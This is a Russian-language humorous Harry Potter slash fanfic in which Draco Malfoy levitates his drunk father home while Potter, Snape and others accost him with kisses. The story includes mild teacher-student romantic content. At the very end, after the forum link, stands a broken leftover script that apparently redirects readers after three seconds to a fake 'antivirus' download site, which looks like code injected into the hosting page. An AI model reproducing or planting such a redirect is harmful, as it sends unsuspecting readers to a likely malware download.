Путь домой

Автор: Нюшка
Бета: Таня Геллер
Pairing: Люциус Малфой, Драко Малфой
Rating: PG-13
Категория: slash
Жанр: humour
Summary: быть преданным сыном нелегко, особенно, если твой отец – Люциус Малфой.
Архивация: пожалуйста, предупредите автора, если хотите разместить этот фик на другом сайте.

- Папаша, папаша, и зачем же вы так нажрались? Ну, литр, ну два, но зачем столько-то? – риторически вопрошал Драко Малфой горестным тоном, занимаясь доставкой на дом собственного сиятельного родителя, милорда Люциуса Малфоя. Ответить вышеозначенный Люциус ничего не мог. Впрочем, услышать стенания сыночка – тоже. Он находился в состоянии сильнейшего алкогольного опьянения, и спокойно дрых, не ощущая особенных неудобств, от избранного отпрыском способа транспортировки.

- Тащи вас теперь на собственном горбу… - ворчал неблагодарный сын.

Драко нагло врал.

Во-первых, он не тащил Люциуса на своем горбу. Ну, он же волшебник или погулять вышел? Конечно, магических сил юноши с трудом хватало для удерживания отца в вертикальном положении в полуметре над землей, но все же это было не то же самое, что тащить крупного мужика на собственной спине. Кроме того, папаша болтался вверх тормашками, и развернуть его в более приличествующее положение - головой вверх - у Драко кишка была тонка. Фигуры вращения они на заклинаниях еще не изучали. Ну, так папе сейчас все равно. А остальным тем более ни холодно, ни жарко: головой вниз ничуть не хуже.

Во-вторых, Люциус много не пил. Сейчас. Раньше он мог перепить любого, и после этого подвига возвращался домой с высоко поднятой головой, прямой спиной, почти не опираясь на трость. Однако теперь, какая–то глупая маггловская фантастическая книжонка, подсказала благородному Люциусу Малфою новый способ ловли кайфа. Рецепт был упоительно прост и доступен. Не из тех, конечно, которые известны любому мало-мальски вышедшему из подросткового возраста магглу (вода, дрожжи и сахар). Находка милорда подходила только для волшебника, посему не вызвала у старшего Малфоя чувства внутреннего протеста. Легкое, почти неуловимое, прикосновение концом волшебной палочки к обнаженному участку кожи на запястье, где пульсировала синяя венка, негромким голосом произнесенное заклинание трансфигурации, и кубик крови, оказавшийся в этот момент под воздействием магии, превращался в кубик спирта. Прекрасный, экологически чистый способ опьянеть до состояния недержания волшебной палочки в рекордно короткие сроки…

Сначала Драко даже порадовался за милого родителя. От прошлого пьянства очень страдала печень Люциуса, и преданному сыночку уже надоело тянуть втихаря зелья из кабинета Снейпа. Хотя была во всем этом и светлая сторона. Пробираясь ночью к шкафам в кабинете зельеварения за антипохмельным зельем, Малфой младший как-то наткнулся на крадущегося в район тех же шкафов Гарри Поттера. Чем это закончилось, Драко до сих пор вспоминал с удовлетворенной улыбкой котика объевшегося сметаны. Впрочем, почему закончилось? Роман с Гарри был в самом разгаре, вот только его достойному продолжению сильно мешали находящиеся в самом зените еще несколько других, не менее привлекательных романов

Сейчас Драко был очень зол. На сегодняшний вечер у него были обширные планы и богатый выбор прелестных забав. Но судьба, конечно, не упустила случая подложить ему громадную свинью. Вернее – сову. Серая, чудовищных размеров зверюга, принадлежащая Эвану Забини - отцу Блейз, приземлилась на подоконник в тот торжественный момент, когда слизеринский красавчик тщательно наносил гель на недавно вымытые, блестящие волосы. Еще не распечатав заляпанный, мятый конверт, Драко уже догадался, что планам на вечер сбыться не суждено.

Собрания партийной ячейки Упивающихся Смертью проходили обычно в теплой и дружественной обстановке, а также в атмосфере тщательной соблюдаемой конспирации. Упивающиеся снимали на весь вечер бар «Три метлы» в Хогсмите и старательно делали вид, что у них вечеринка по поводу дня рождения одного из присутствующих. Причем притворялись они так успешно, что изредка наведывающимся патрулям авроров, иногда оставалось только развезти по домам полубесчувственные, сладко похрапывающие тела. Такой способ поддержания секретности нравился Упивающимся до чрезвычайности, и в последнее время собрания резко участились. Сегодня Забини, видимо, смог сохранить относительную ясность рассудка и организовать возвращение коллег в родовые гнезда.

Так что вместо запланированного на вечер, весьма недостойного времяпрепровождения, Драко пришлось изображать из себя ангела милосердия и почтительного сына и тащить папашу в Имение, к счастью расположенное не так уж далеко от Хогварца и Хогсмита. Чего проще было аппарировать туда, доставить отца и заняться своими делами? Но Министерство Магии, с его глупыми возрастными ограничениями, лишило юного Малфоя такого прекрасного шанса. Да и, кроме того, в данном конкретном случае, разрешение вряд ли ему помогло бы. А все почему? Да паранойя у папочки разыгралась не вовремя. Не далее, как несколько дней назад, Люциус в приступе вышеозначенной болезни поставил сильный магический запрет на аппарирование в стенах имения и с прилегающих территорий. Но по пьяни не рассчитал, и в число прилегающих территорий включил Хогсмит и даже часть расположенного вблизи маггловского городка. Будто кто-то спешил аппарировать к ним из этого городишки. Да магглы боялись странного дома на холме больше всего на свете. А неприятностей от ошибки Люциуса было уже выше крыши.

Драко никогда не забыть фразу, которую он услышал из уст родной матушки, когда на следующий день после экспериментов отца, она вернулась из обычной поездки в город за покупками. Когда к девяти часам вечера, нагруженная сумками и пакетами, которые врожденная … м-м-м, ну, скажем бережливость, не позволила ей бросить, вымокшая под дождем, Нарцисса ввалилась в вестибюль их родового гнезда, ее обожаемому сыну захотелось спрятаться под стол от страха. Он и не подозревал, что маман может смотреть так и знает такие слова. Старый дворецкий, который всегда безучастно наблюдал даже за забавами Упивающихся, встретившись взглядом с глазами обычно спокойной и холодноватой миссис Малфой, на месте умер от инфаркта.

Топать до родного дома Драко было еще минут двадцать, а не задевать папой обо все выступающие предметы по сторонам узенькой тропинки было тяжело. Так как они раньше в имение всегда аппарировали, то и прокладывать хорошую дорогу к парадным дверям не было никакой необходимости. Теперь, пожалуй, такая необходимость была. Возвращение домой по узкой и совершенно темной дороге, определенно сложно было отнести к разряду самых привлекательных приключений для Драко Малфоя. Однако выбора не было. Не оставлять же отца в том мерзком притоне, где каждый так и норовил украдкой попинать лежащего на полу в полной отключке Люциуса ногами. Драко уже пытался поставить на повестку дня вопрос посещения отцом собраний. При том способе приема на грудь, который Люциус сейчас практиковал, не было смыла шататься по вечеринкам. Гораздо проще и приятнее напиваться в стельку в родных пенатах. Старший Малфой громко хмыкнул, выслушав его аргументацию сына и, глядя на отпрыска со снисходительной жалостью, величественно произнес:

- Ты ничего не понимаешь, мальчишка. Главное – общение с друзьями.

Ага, друзья. Именно они были во главе очереди желающих приложиться носком сапога к боку “друга” Люца.

Вялотекущие мысли Драко оборвал короткий поцелуй в шею, выполненный из-за спины с акробатической четкостью. Драко вздрогнул и выронил палочку. Не поддерживаемый более магией Люциус, с громким звуком рухнул к ногам сына, но даже не сделал попытки проснуться. Блондин медленно обернулся и прошипел в лучших традициях Снейпа:

- Поттер…

- Гарри, - поправил нежный голос, и теплые губы вновь присосались к шее блондина. Драко решил смириться с неизбежным и не стал особо протестовать против затянувшегося поцелуя.

- Ты как здесь оказался? – улучил мгновение для вопроса слизеринец.

- Я шел за тобой от Хогсмита, - чуть покраснев, пробормотал Гарри, выказывая явное намерение продолжить так не вовремя приостановленное интересное занятие.

Легкий шорох в кустах заставил юношей отскочить друг от друга. Поттер негромко ругнулся и аки испуганная антилопа, развив с места приличную скорость, растворился в придорожных кустах.

Ну, один - растворился, другой - материализовался… Высокая, худая фигура, в трепещущей по ветру мантии, черные как вороново крыло волосы и крючковатый нос:

- Северус… - негромко выдохнул Драко, лихорадочно соображая, видел ли Снейп предыдущую сцену. Получалось, что вроде и не видел. Драко наклонился, поднял палочку и привел родителя в более достойное его титула положение.

- Мистер Драко Малфой, - почти пропел профессор Снейп подходя поближе, облизывая длинным языком тонкие губы и не обращая внимания на парящего рядом с сыном Люциуса.

- Ты откуда? – спросил Драко

- Я шел за тобой от Хогсмита, - вкрадчиво прошептал Снейп, жадно глядя на губы Драко

«Интересно, из Хогсмита только одна дорога, как они с Поттером умудрились не встретиться? И потом: он то почему трезвый?» Исполнение шпионского долга требовало от мастера зельеварения неукоснительного присутствия на всех собраниях Упивающихся. Небось, антипохмельный составчик бахнул перед выходом в свет… Хитрый старый лис.

Профессор зельеварения, между тем, не стал пробираться к цели окольными путями, и впечатался в губы юноши смачным крепким поцелуем. Драко как бы и не возражал, вот только он снова выронил палочку. И, соответственно, папочку тоже. Палочка с нежным негромким звуком ударилась о землю. Папочка тоже ударился о землю. Звук, правда, был другой, не такой приятный. Драко встревожено скосил глаза, что в его положение было определенно тяжеловато, но, увидев, что Люциус на падение не отреагировал, продолжил весьма поучительное занятие. Да, профессор зельеварения явно разбирался не только в зельях… Драко уже начал получать удовольствие, как вдруг Снейп отпрянул от него, и произнес несколько таких выражений, которые заставили слегка покраснеть даже бывалого младшего Малфоя. «Ого», - подумал он, - «где это Северус такие слова слышал? Явно не в Хогварце. Если бы в Хоге кто-то имел такой лексикон, это не прошло бы незамеченным».

- Тут были губы Поттера! Я узнаю вкус, - угрожающе прошипел Снейп, потом резким движением сложил полы мантии, словно крылья гигантской летучей мыши, и по примеру предыдущего соискателя, оскорблено растворился во тьме.

- Эй, а ты-то, откуда знаешь, каковы на вкус губы Поттера? – запоздало крикнул Драко вслед. Ответа он, конечно, не получил, и, чертыхаясь (и не только чертыхаясь) поднял палочку, возвращая отца в вертикальное состояние. Чувствовал он себя не слишком комфортно, последний поцелуй был чрезвычайно приятен, и теперь, ставшие внезапно слишком тесными в некоторых местах бриджи, напомнили Драко несомненную истину: не начинай дело, которое не собираешься заканчивать, вернее кончать.

Драко не видел, как сзади из кустов, соседних с теми, в которых недавно пропал Поттер, в его направлении метнулась черная тень…

Малфой заметил неладное только тогда, когда чьи-то крепкие руки по-медвежьи облапили его плечи, и чей-то острый нос довольно больно ткнулся в ложбинку между лопаток.

Надо ли говорить, что волшебная палочка Драко и его многострадальный папенька вновь приземлились на траву? Причем, если никаких явных повреждений на палочке не наблюдалось, то на лбу Люциуса, которым тот приложился к камушку, быстро зрел красивый, яркий синяк

- …..!!!, - от испуга очень четко сказал Драко, делая рефлекторное движение рукой назад. Острый локоть врезался в мягкое тело в районе солнечного сплетения…

-.. ….. ….!!!, - невнятно, но эмоционально прохрипел голос нападавшего. Опознать на основе полузадушенного шепота личность, стоящего сзади человека, было невозможно, а когда Драко, наконец, развернулся, он увидел лишь темный силуэт, который, слегка покачиваясь, трусил по тропинке в направлении Хогсмита.

- Да, вот и недостатки расположения собственного дома в непосредственной близости от собственной школы, - раздраженно бормотал младший Малфой, шаря руками по земле в поисках закатившейся куда-то палочки. Счастье еще, что размеры Люциуса были достаточными для того, чтобы он не мог затеряться в траве.

- Но кто же это был? – уже недоуменно закончил Малфой, припоминая смутные ощущения, которые испытал во время кратких и неудачных объятий. Потом тщательно осмотрел свою мантию и, обнаружив на плече рыжий волос, задумался еще глубже. «Уизли, Уизли или Уизли?». Драко еще не впал в маразм, просто твердо помнил, что в школе не один Уизли…

Из глубокой задумчивости юношу вывела рука, которая бережно, но весьма чувствительно дернула за белокурый локон.

- Драко, - томно протянул голос, и из темноты выступила приземистая фигура Лонгботтома…

Младший Малфой провел глазами до земли папочку и палочку, отмечая, что родитель уже привычно складывается в компактную кучку, и обреченно подумал: «Тенденция, однако». После чего посмотрел на Невилля. Наверное, он смотрел как-то очень нехорошо, потому что Лонгботтом испуганно попятился и залепетал:

- А я - что? Я – ничего… Всем, значит - можно, а мне, значит – нельзя?

- Невилль, - сказал блондин очень ласково, - а не пошел бы ты…

Невилль видимо хорошо знал, что означает подобная ласка в голосе Драко, поэтому покорно развернулся и пошел в указанном Малфоем направлении. Он утирал полой грязноватой мантии слезы и громко демонстративно шмыгал носом, что на жестокого слизеринца не производило совершенно никакого впечатления. Вновь подобрав палочку (ну, естественно, и папочку) Малфой младший медленно и осторожно, периодически оглядываясь назад и внимательно наблюдая за окрестными кустами, пошел к возвышающемуся невдалеке Имению…

Преданный сын, со всей возможной заботой и нежностью бережно уложил Люциуса Малфоя на постель, почистил от пыли и грязи его одежду и ласково оправил светлые волосы. Потом он долго стоял возле кровати, с умилением глядя на отца. С непередаваемым огорчением Драко отметил папину бледность и наличие нескольких крупных шишек на темечке и лбу, а так же кровоподтека на скуле…

Трогая языком собственные опухшие губы, младший Малфой еще долго размышляя: «Нет, ну все-таки, кто это был?»

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>